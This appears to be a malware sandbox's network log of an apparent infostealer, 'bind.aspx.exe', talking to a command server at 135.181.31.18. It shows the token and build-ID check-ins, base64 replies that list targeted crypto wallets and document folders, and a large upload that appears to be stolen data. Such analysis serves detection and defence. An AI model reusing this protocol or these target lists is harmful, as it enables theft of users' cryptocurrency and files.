                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:46 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------JKEHIIJJECFHJKECFHDGCont
                                                                                                                                                                                    2024-09-28 01:29:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:47 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:47 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.749714135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:48 UTC306OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 8197
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:48 UTC8197OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------CBFBKFIDHIDGHJKFBGHCCont
                                                                                                                                                                                    2024-09-28 01:29:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:49 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    7192.168.2.749715135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:49 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 829
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:49 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------KFHCAEGCBFHJDGCBFHDACont
                                                                                                                                                                                    2024-09-28 01:29:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:50 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    8192.168.2.749716135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:50 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 437
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:50 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------IEHJJECBKKECFIEBGCAKCont
                                                                                                                                                                                    2024-09-28 01:29:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:51 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    9192.168.2.749717135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:51 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 437
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:51 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------DHIJDHIDBGHJKECBFIIDCont
                                                                                                                                                                                    2024-09-28 01:29:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:52 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    10192.168.2.749718135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:53 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:53 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------AEGIJKEHCAKFCAKFHDAACont
                                                                                                                                                                                    2024-09-28 01:29:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:54 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:54 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    11192.168.2.749719135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:54 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------HCFBFBAEBKJKEBGCAEHCCont
                                                                                                                                                                                    2024-09-28 01:29:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:55 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:55 UTC195INData Raw: 62 38 0d 0a 52 45 39 58 54 6b 78 50 51 55 52 54 66 43 56 45 54 31 64 4f 54 45 39 42 52 46 4d 6c 58 48 77 71 4c 6e 52 34 64 48 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 48 52 79 64 57 56 38 4b 6e 64 70 62 6d 52 76 64 33 4d 71 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: b8RE9XTkxPQURTfCVET1dOTE9BRFMlXHwqLnR4dHw1MHxmYWxzZXwqd2luZG93cyp8RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8REVTS1RPUHwlREVTS1RPUCVcfCoudHh0fDUwfHRydWV8KndpbmRvd3MqfA==0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.749720135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:56 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 457
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:56 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------KFHCAEGCBFHJDGCBFHDACont
                                                                                                                                                                                    2024-09-28 01:29:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:56 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    13192.168.2.749721135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:58 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 129565
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------CGHCGIIDGDAKFIEBKFCFCont
